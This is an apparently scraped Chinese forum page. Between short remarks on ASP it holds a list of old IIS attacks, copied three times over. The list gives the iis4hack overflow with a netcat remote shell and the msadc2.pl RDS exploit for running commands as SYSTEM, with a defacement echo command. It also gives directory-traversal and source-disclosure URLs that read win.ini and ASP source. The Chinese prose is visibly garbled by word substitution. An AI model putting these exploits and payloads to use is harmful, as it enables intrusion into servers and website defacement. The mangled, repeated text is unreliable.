|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
楼上说交互性不好,太牵强了吧。在微软提供的一套框架中,利用asp做网站,开发效率高,使用人数少,减少不必要的开销。交互性是互动方式,是有开发人员决定的。iis|平安|平安毛病 1.iis4hack缓冲溢出
次要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL哀求没有对名字举行充实的界限反省,招致运转打击者拔出一些后门程序在体系中下载和实行程序。要检测如许的站点你必要两个文件iishack.exe,ncx.exe,你能够到上面的站点www.technotronic.com往下载,别的你还必要一台本人的WEB服务器。你如今你本人的WEB服务器上运转WEB服务程序并把ncx.exe放到你本人响应的目次下,然后利用iishack.exe来反省方针呆板:
c:>iishack.exe80/ncx.exe
然后你就利用netcat来毗连你要检测的服务器:
c:>nc80
假如溢出点准确你就能够看到方针呆板的命令行提醒,而且是办理远权限。使用程序见iis4hack.zip
2.msadc
IIS的MDAC组件存在一个毛病能够招致打击者远程实行你体系的命令。次要中心成绩是存在于RDSDatafactory,默许情形下,它同意远程命令发送到IIS服务器中,这命令会以设备用户的身份运转,其一样平常默许情形下是SYSTEM用户。使用程序为msadc2.pl,我们看看它的help
[quack@chatquack]$perlmsadc2.pl-h
--RDSsmackv2-rainforestpuppy/ADM/wiretrip--
Usage:msadc.pl-h{-d-X-v}
-h=hostyouwanttoscan(ipordomain)
-d=delaybetweencalls,default1second
-X=dumpIndexServerpathtable,ifavailable
-N=queryVbBusObjforNetBIOSname
-V=useVbBusObjinsteadofActiveDataFactory
-v=verbose
-e=externaldictionaryfileforstep5
-u<hostsharefile>=useUNCfile
-w=Windows95insteadofWindowsNT
-c=v1compatibility(threestepquery)
-s=runonlystep
Ora-Rwillresumea(v2)commandsession
[quack@chatquack]$perlmsadc2.pl-hhttp://www.targe.com/
--RDSsmackv2-rainforestpuppy/ADM/wiretrip--
Typethecommandlineyouwanttorun(cmd/cassumed):
cmd/c
假如呈现cmd/c后,间接键进命令行,就能够以system权限实行命令了。好比xundi教的:
echohackedbyme>d:inetpubwwwrootvictimwebindex.htm
3.Codebrws.asp
观察文件源代码
http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp
4.Showcode.asp
观察文件源代码
http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini
5.Null.htw
观察文件源代码
http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full
6.webhits.dll&.htw
hit-highligting功效是由IndexServer供应的同意一个WEB用户在文档上highlighted(凸起)他们原始搜刮的条目,这个文档的名字经由过程变量CiWebhitsfile传送给.htw文件,Webhits.dll是一个ISAPI使用程序来处置哀求,翻开文件并前往了局,当用户把持了CiWebhitsfile参数传送给.htw时,他们就能够哀求恣意文件,了局就是招致检察ASP源码和其他剧本文件内容。要懂得你是不是存在这个毛病,你能够哀求以下条目:
http://www.victim.com/nosuchfile.htw假如你从服务器端取得以下信息:
formatoftheQUERY_STRINGisinvalid这就暗示你存在这个毛病.这个成绩次要就是webhits.dll联系关系了.htw文件的映照,以是你只需作废
这个映照就可以制止这个毛病,你能够在你以为有毛病的体系中搜刮.htw文件,一样平常会发明以下的程序:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw(这个通常是loopback利用)
一个打击者可使用以下的办法来会见体系中文件的内容:
http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?
ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full
就会在有此毛病体系中win.ini文件的内容。7.ASPAlternateDataStreams(::$DATA)要检察一些.asp文件的内容,你能够哀求以下的URL:http://www.victim.com/default.asp::$DATA你就失掉了源代码
7.iis4hack缓冲溢出
次要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL哀求没有对名字举行充实的界限反省,招致运转打击者拔出一些后门程序在体系中下载和实行程序。要检测如许的站点你必要两个文件iishack.exe,ncx.exe,你能够到上面的站点www.technotronic.com往下载,别的你还必要一台本人的WEB服务器。你如今你本人的WEB服务器上运转WEB服务程序并把ncx.exe放到你本人响应的目次下,然后利用iishack.exe来反省方针呆板:
c:>iishack.exe80/ncx.exe
然后你就利用netcat来毗连你要检测的服务器:
c:>nc80
假如溢出点准确你就能够看到方针呆板的命令行提醒,而且是办理远权限。使用程序见iis4hack.zip
8.msadc
IIS的MDAC组件存在一个毛病能够招致打击者远程实行你体系的命令。次要中心成绩是存在于RDSDatafactory,默许情形下,它同意远程命令发送到IIS服务器中,这命令会以设备用户的身份运转,其一样平常默许情形下是SYSTEM用户。使用程序为msadc2.pl,我们看看它的help
[quack@chatquack]$perlmsadc2.pl-h
--RDSsmackv2-rainforestpuppy/ADM/wiretrip--
Usage:msadc.pl-h{-d-X-v}
-h=hostyouwanttoscan(ipordomain)
-d=delaybetweencalls,default1second
-X=dumpIndexServerpathtable,ifavailable
-N=queryVbBusObjforNetBIOSname
-V=useVbBusObjinsteadofActiveDataFactory
-v=verbose
-e=externaldictionaryfileforstep5
-u<hostsharefile>=useUNCfile
-w=Windows95insteadofWindowsNT
-c=v1compatibility(threestepquery)
-s=runonlystep
Ora-Rwillresumea(v2)commandsession
[quack@chatquack]$perlmsadc2.pl-hhttp://www.targe.com/
--RDSsmackv2-rainforestpuppy/ADM/wiretrip--
Typethecommandlineyouwanttorun(cmd/cassumed):
cmd/c
假如呈现cmd/c后,间接键进命令行,就能够以system权限实行命令了。好比xundi教的:
echohackedbyme>d:inetpubwwwrootvictimwebindex.htm
9.Codebrws.asp
观察文件源代码
http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp
10.Showcode.asp
观察文件源代码
http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini
11.Null.htw
观察文件源代码
http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full
12.webhits.dll&.htw
hit-highligting功效是由IndexServer供应的同意一个WEB用户在文档上highlighted(凸起)他们原始搜刮的条目,这个文档的名字经由过程变量CiWebhitsfile传送给.htw文件,Webhits.dll是一个ISAPI使用程序来处置哀求,翻开文件并前往了局,当用户把持了CiWebhitsfile参数传送给.htw时,他们就能够哀求恣意文件,了局就是招致检察ASP源码和其他剧本文件内容。要懂得你是不是存在这个毛病,你能够哀求以下条目:
http://www.victim.com/nosuchfile.htw假如你从服务器端取得以下信息:
formatoftheQUERY_STRINGisinvalid这就暗示你存在这个毛病.这个成绩次要就是webhits.dll联系关系了.htw文件的映照,以是你只需作废
这个映照就可以制止这个毛病,你能够在你以为有毛病的体系中搜刮.htw文件,一样平常会发明以下的程序:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw(这个通常是loopback利用)
一个打击者可使用以下的办法来会见体系中文件的内容:
http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?
ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full
就会在有此毛病体系中win.ini文件的内容。7.ASPAlternateDataStreams(::$DATA)要检察一些.asp文件的内容,你能够哀求以下的URL:http://www.victim.com/default.asp::$DATA你就失掉了源代码
13.iis4hack缓冲溢出
次要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL哀求没有对名字举行充实的界限反省,招致运转打击者拔出一些后门程序在体系中下载和实行程序。要检测如许的站点你必要两个文件iishack.exe,ncx.exe,你能够到上面的站点www.technotronic.com往下载,别的你还必要一台本人的WEB服务器。你如今你本人的WEB服务器上运转WEB服务程序并把ncx.exe放到你本人响应的目次下,然后利用iishack.exe来反省方针呆板:
c:>iishack.exe80/ncx.exe
然后你就利用netcat来毗连你要检测的服务器:
c:>nc80
假如溢出点准确你就能够看到方针呆板的命令行提醒,而且是办理远权限。使用程序见iis4hack.zip
14.msadc
IIS的MDAC组件存在一个毛病能够招致打击者远程实行你体系的命令。次要中心成绩是存在于RDSDatafactory,默许情形下,它同意远程命令发送到IIS服务器中,这命令会以设备用户的身份运转,其一样平常默许情形下是SYSTEM用户。使用程序为msadc2.pl,我们看看它的help
[quack@chatquack]$perlmsadc2.pl-h
--RDSsmackv2-rainforestpuppy/ADM/wiretrip--
Usage:msadc.pl-h{-d-X-v}
-h=hostyouwanttoscan(ipordomain)
-d=delaybetweencalls,default1second
-X=dumpIndexServerpathtable,ifavailable
-N=queryVbBusObjforNetBIOSname
-V=useVbBusObjinsteadofActiveDataFactory
-v=verbose
-e=externaldictionaryfileforstep5
-u<hostsharefile>=useUNCfile
-w=Windows95insteadofWindowsNT
-c=v1compatibility(threestepquery)
-s=runonlystep
Ora-Rwillresumea(v2)commandsession
[quack@chatquack]$perlmsadc2.pl-hhttp://www.targe.com/
--RDSsmackv2-rainforestpuppy/ADM/wiretrip--
Typethecommandlineyouwanttorun(cmd/cassumed):
cmd/c
假如呈现cmd/c后,间接键进命令行,就能够以system权限实行命令了。好比xundi教的:
echohackedbyme>d:inetpubwwwrootvictimwebindex.htm
15.Codebrws.asp
观察文件源代码
http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp
16.Showcode.asp
观察文件源代码
http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini
17.Null.htw
观察文件源代码
http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full
18.webhits.dll&.htw
hit-highligting功效是由IndexServer供应的同意一个WEB用户在文档上highlighted(凸起)他们原始搜刮的条目,这个文档的名字经由过程变量CiWebhitsfile传送给.htw文件,Webhits.dll是一个ISAPI使用程序来处置哀求,翻开文件并前往了局,当用户把持了CiWebhitsfile参数传送给.htw时,他们就能够哀求恣意文件,了局就是招致检察ASP源码和其他剧本文件内容。要懂得你是不是存在这个毛病,你能够哀求以下条目:
http://www.victim.com/nosuchfile.htw假如你从服务器端取得以下信息:
formatoftheQUERY_STRINGisinvalid这就暗示你存在这个毛病.这个成绩次要就是webhits.dll联系关系了.htw文件的映照,以是你只需作废
这个映照就可以制止这个毛病,你能够在你以为有毛病的体系中搜刮.htw文件,一样平常会发明以下的程序:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw(这个通常是loopback利用)
一个打击者可使用以下的办法来会见体系中文件的内容:
http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?
ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full
就会在有此毛病体系中win.ini文件的内容。7.ASPAlternateDataStreams(::$DATA)要检察一些.asp文件的内容,你能够哀求以下的URL:http://www.victim.com/default.asp::$DATA你就失掉了源代码
asp对于服务器的要求较高,一般的服务器如果访问量一大就垮了,不得不重启。 |
|